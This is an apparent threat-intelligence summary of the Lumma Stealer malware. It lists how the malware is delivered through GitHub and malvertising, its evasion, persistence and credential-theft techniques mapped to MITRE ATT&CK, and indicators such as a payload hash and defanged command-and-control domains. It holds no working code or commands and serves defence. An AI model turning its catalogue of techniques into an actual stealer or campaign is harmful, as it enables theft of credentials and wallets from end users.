Lumma Stealer is an evolving info-stealing malware-as-a-service exploited via trusted platforms like GitHub to harvest credentials, crypto wallets, and personal data using advanced evasion, scripting, and living-off-the-land techniques. (Affected: Cybercrime sector, end users, software developers)
Keypoints :
- Lumma Stealer is a MaaS infostealer first seen in 2022, with a 369% infection rise in 2024.
- Distributed via GitHub abuse, fake comments, malvertising, and social engineering.
- Uses defense evasion like sandbox detection, payload encryption, polyglot files, and obfuscation.
- Employs living-off-the-land binaries (mshta.exe, PowerShell, wscript.exe) and process hollowing techniques.
- Initial access through spearphishing and social engineering targeting developers and users.
- Steals web browser credentials, session cookies, cryptocurrency wallets, and 2FA secrets.
- Persistence achieved via startup folder shortcuts and scheduled tasks installing malicious scripts.
- Anti-analysis includes artifact cleanup and sandbox/virtual environment detection.
- Command and Control communication over HTTP/HTTPS to exfiltrate stolen data securely.
- Security controls should be tested continuously using breach simulation platforms to detect Lummaβs TTPs.
MITRE Techniques :
- Spearphishing Link (T1566.002/T1566.003) – Use of fake GitHub notifications and comments to trick victims into downloading malware.
- Drive-by Compromise (T1189) – Malvertising and web redirects funnel users to fake CAPTCHA pages executing malicious commands.
- User Execution (T1204.002) – Victims manually run trojanized executables disguised as legitimate tools.
- Command and Scripting Interpreter (T1059) – Use of PowerShell and mshta to execute obfuscated scripts and remotely hosted payloads.
- Signed Binary Proxy Execution: mshta.exe (T1218.005) – Abuse of trusted signed binaries to execute malware without dropping files on disk.
- Process Hollowing (T1055.012) – Malicious code injected into legitimate processes to hide execution.
- Indicator Removal on Host: File Deletion (T1070.004) – Deletion of malware artifacts and temporary files post-execution.
- Virtualization/Sandbox Evasion (T1497.001) – System checks for security tools and sandbox environments to alter behavior.
- Credentials from Web Browsers (T1555.003) – Harvesting stored passwords and cookies from browser databases.
- Steal Web Session Cookies (T1539) – Capture session cookies for account hijacking and bypassing MFA.
- Browser Extensions (T1552.001) – Targeting crypto wallet and 2FA browser extensions to steal keys and authentication seeds.
- Keylogging (T1056.001) and Clipboard Data (T1115) – Capturing keystrokes and clipboard content to steal sensitive information.
- Persistence via Startup Folder and Scheduled Tasks (T1547) – Creation of .url shortcuts and scheduled execution of malicious scripts.
- Masquerading (T1036) – Using legitimate-looking file names and stolen code-signing certificates to appear trustworthy.
Indicator of Compromise :
- The article includes URLs used for delivering Lumma, such as GitHub release asset links and MediaFire download links disguised as fixes.
- Cryptographic hashes of malicious Lumma payloads like SHA256 B127DE888F09CE23937C12B7FCCFA47A8F48312B0E43EB59B6243F665C6D366A are provided.
- Command lines abusing mshta.exe and PowerShell with encoded commands to execute malicious scripts remotely.
- Scheduled task and startup folder entries such as βLodgingβ task running JavaScript payloads indicate persistence mechanisms.
- Domain names used during infection (e.g., lumdukekiy[.]shop, kiddoloom[.]shop) associated with command and control servers.
Views: 27